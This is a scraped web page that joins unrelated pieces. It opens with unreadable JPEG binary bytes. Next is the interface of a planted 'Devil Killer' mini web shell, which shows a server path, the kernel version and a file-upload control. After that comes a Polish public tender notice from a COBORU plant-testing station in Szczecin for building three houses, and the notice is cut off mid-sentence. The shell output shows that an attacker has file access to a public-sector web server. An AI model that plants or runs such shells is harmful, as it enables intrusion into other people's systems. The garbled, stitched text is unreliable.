JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221019/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221019/0040046201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa zespołu budynków gospodarstwa rolnego składająca się z :<br/> Etap I budowa trzech budynków mieszkalnych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centralny Ośrodek Badania Odmian Roślin Uprawnych Stacja Doświadczalna Oceny Odmian w Szczecinie Dąbiu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SDOO Szczecin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 30163140800126</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Goleniowska 56a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-847</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">502141882</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">l.gawlik@szczecin.coboru.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szczecin.coboru.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> rejestracja i badanie odmian roślin uprawnych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa zespołu budynków gospodarstwa rolnego składająca się z :<br/> Etap I budowa trzech budynków mieszkalnych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-99d0343b-4f20-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00400462</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00050865/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa trzech budynków mieszkalnych - Nowe Linie - Etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szczecin.coboru.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szczecin.coboru.gov.pl/<br/>miniportal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a <br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy miniPortal <br/>https://miniportal.uzp.gov.pl/ platformy ePUAPu https://epuap.gov.pl/wps/portal<br/>oraz poczty elektronicznej. <br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie <br/>zamówienia publicznego, musi posiadać konto na platformie ePUAP. <br/>Wykonawca posiadający konto na platformie ePUAP ma dostęp do formularzy:<br/>Formularz do złożenia, zmiany, wycofania oferty lub wniosku oraz Formularz do <br/>komunikacji. <br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów <br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji <br/>przekazywanych przy ich użyciu, opisane zostały w Regulaminie korzystania z <br/>systemu miniPortal dostępnym pod adresem internetowym <br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z <br/>elektronicznej platformy usług administracji publicznej (ePUAP) dostępnych pod <br/>adresem internetowym https://www.gov.pl/web/gov/warunki-korzystania . <br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia <br/>publicznego, akceptuje warunki korzystania z platformy miniPortal, określone w <br/>Regulaminie korzystania z systemu miniPortal oraz zobowiązuje się korzystając <br/>z platformy miniPortal przestrzegać postanowień tego regulaminu. <br/>17<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych <br/>formularzy: Formularz do złożenia, zmiany, wycofania oferty lub wniosku oraz <br/>Formularz do komunikacji wynosi 150 MB. <br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów <br/>elektronicznych, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, <br/>podmiotowych środków dowodowych, przedmiotowych środków dowodowych <br/>oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w <br/>postępowaniu, przyjmuje się datę ich przekazania na platformę ePUAP. <br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna <br/>niż oferta <br/>Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem <br/>dedykowanego Formularza do komunikacji dostępnego na platformie ePUAP <br/>oraz udostępnionego przez platformę miniPortal. Korespondencja przesłana za <br/>pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji <br/>związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się <br/>numerem ogłoszenia (BZP lub ID postępowania z platformy miniPortal). <br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą <br/>poczty elektronicznej, email: l.gawlik@szczecin.coboru.gov.pl<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów <br/>lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza <br/>do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość<br/>składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii <br/>dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email: <br/>l.gawlik@szczecin.coboru.gov.pl. Sposób sporządzenia dokumentów <br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub <br/>oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu <br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu <br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla <br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w <br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 <br/>poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 <br/>grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych <br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy <br/>(Dz.U. z 2020 poz. 2415). <br/>10.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny <br/>sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. <br/>11.Zamawiający dla ułatwienia potencjalnym Wykonawcom złożenie oferty <br/>zamieszcza na stronie internetowej instrukcję.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://szczecin.coboru.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z <br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie <br/>danych), dalej „RODO”, informuję, że: <br/>• administratorem Pani/Pana danych osobowych jest COBORU Stacja <br/>Doświadczalna Oceny Odmian w Szczecinie Dąbiu. <br/>• w sprawach związanych z Pani/Pana danymi proszę kontaktować się z <br/>Inspektorem Ochrony Danych, kontakt pisemny za pomocą poczty elektronicznej <br/>na adres e-mail: iod@hannawata.pl <br/>•Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c <br/>RODO w celu prowadzenia przedmiotowego postępowania o udzielenie <br/>zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich <br/>przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur <br/>udzielania zamówień publicznych spoczywający na Zamawiającym; <br/>XVI. Projektowane postanowienia umowy<br/>XVII. Informacje o środkach ochrony prawnej<br/>30<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. <br/>74 ustawy Pzp; <br/>•Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy <br/>Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie <br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres <br/>przechowywania obejmuje cały czas trwania umowy; <br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio <br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach <br/>ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia <br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy <br/>Pzp; <br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>•Posiada Pan/Pani: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana <br/>dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana <br/>danych osobowych, przy czym skorzystanie z prawa do sprostowania lub <br/>uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie <br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie nie-zgodnym <br/>z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego <br/>załączników. <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma <br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania <br/>ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub <br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub <br/>państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych <br/>do czasu zakończenia postępowania o udzielenie zamówienia. <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy <br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza <br/>przepisy RODO; <br/>• nie przysługuje Pani/Panu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO. <br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku <br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których <br/>dane przekazane zostaną Zamawiającemu w związku z prowadzonym <br/>31<br/>postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego <br/>udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, <br/>o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/ZS/01/10/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 4351403,84 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> etap I budowa trzech budynków mieszkalnych - Nowe Linie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1) spełniają warunki udziału w postępowaniu, o ile zostały <br/>one określone 2) nie podlegają wykluczeniu z postępowania. <br/>1. Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w <br/>postępowaniu. O udzielenie przedmiotowego zamówienia mogą ubiegać się <br/>Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>1.1. zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie; <br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie; <br/>1.3. sytuacji ekonomicznej lub finansowej: <br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają środki <br/>finansowe lub zdolność kredytową w wysokości co najmniej 100.000,00 zł<br/>(słownie złotych: sto tysięcy 00/100).<br/>1.4. zdolności technicznej lub zawodowej: <br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności <br/>technicznej lub zawodowej: <br/>1.4.1. doświadczenia: <br/> O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia <br/>łącznie następujące warunki: <br/>1) w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli <br/>okres prowadzenia działalności jest krótszy, w tym okresie, wykonał <br/>należycie m.in. jedną robotę budowlaną polegającą na budowie budynku <br/>mieszkalnego o powierzchni co najmniej 100 m2 <br/>.<br/>Zamawiający wymaga, aby wykazana robota budowlana zrealizowana <br/>zastała na podstawie zawartej 1 umowy o robotę budowlaną. Nie <br/>dopuszcza się łączenia kilku umów, w celu wykazania spełnienia<br/>warunku udziału w postępowaniu.<br/>1.4.2. osób zdolnych do realizacji zamówienia: <br/>O udzielenie zamówienia może ubiegać się Wykonawca, który skieruje do <br/>realizacji zamówienia osobę: <br/>1) posiadającą uprawnienia budowlane do kierowania budową lub innymi <br/>robotami budowlanymi w specjalności konstrukcyjno – budowlanej <br/>bez ograniczeń, bądź też odpowiadające im uprawnienia budowlane <br/>wydane na podstawie wcześniej obowiązujących przepisów <br/>umożliwiające wykonywanie funkcji kierownika budowy w zakresie <br/>objętym dokumentacją projektową, <br/>2) posiadającą uprawnienia budowlane do pełnienia funkcji kierowania robót <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń <br/>10<br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i <br/>kanalizacyjnych bez ograniczeń, bądź też odpowiadające <br/>im uprawnienia budowlane wydane na podstawie wcześniej <br/>obowiązujących przepisów umożliwiające wykonywanie funkcji <br/>kierownika budowy w zakresie objętym dokumentacją projektową, <br/>3) posiadającą uprawnienia budowlane do pełnienia funkcji kierowania robót <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń <br/>elektrycznych i elektroenergetycznych bez ograniczeń, bądź też <br/>odpowiadające im uprawnienia budowlane wydane na podstawie <br/>wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji <br/>kierownika budowy w zakresie objętym dokumentacją projektową, <br/>Zamawiający dopuszcza łączenie specjalności wskazanych wyżej przez jedną osobę. <br/>W przypadku Wykonawców zagranicznych dopuszcza się kwalifikacje <br/>równoważne do ww. zdobyte w innych państwach, na zasadach określonych w art. <br/>12 a ustawy Prawo budowlane oraz w ustawie z dnia 22 grudnia 2015 r. o <br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach <br/>członkowskich Unii Europejskiej. W przypadku osób, które są obywatelami państw <br/>członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw <br/>członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw <br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron <br/>umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a ustawy z <br/>dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów <br/>budownictwa, osoby wyznaczone do realizacji zamówienia posiadają uprawnienia <br/>budowlane do kierowania robotami budowlanymi, wyszczególnione wyżej jeżeli: <br/>- nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, <br/>równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie <br/>na terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień <br/>budowlanych do kierowania robotami budowlanymi oraz posiadają odpowiednią <br/>decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o <br/>uznaniu kwalifikacji zawodowych zostały spełnione w stosunku do tych osób <br/>wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o <br/>samorządach zawodowych architektów, inżynierów budownictwa, dotyczące <br/>świadczenia usług transgranicznych. <br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego. <br/>2.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia <br/>publicznego. W takim przypadku Wykonawcy występujący wspólnie są <br/>zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w <br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy <br/>w sprawie przedmiotowego zamówienia publicznego. Wszelka <br/>korespondencja będzie prowadzona przez zamawiającego wyłącznie z <br/>pełnomocnikiem. <br/>2.2. Warunek dotyczący uprawnień do prowadzenia określonej działalności <br/>gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w <br/>art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, 